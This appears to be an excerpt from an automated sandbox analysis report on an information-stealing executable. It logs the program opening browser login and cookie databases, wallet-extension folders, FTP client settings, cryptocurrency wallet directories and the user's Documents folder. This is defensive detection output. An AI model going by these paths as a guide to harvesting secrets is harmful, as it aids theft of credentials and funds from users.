Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
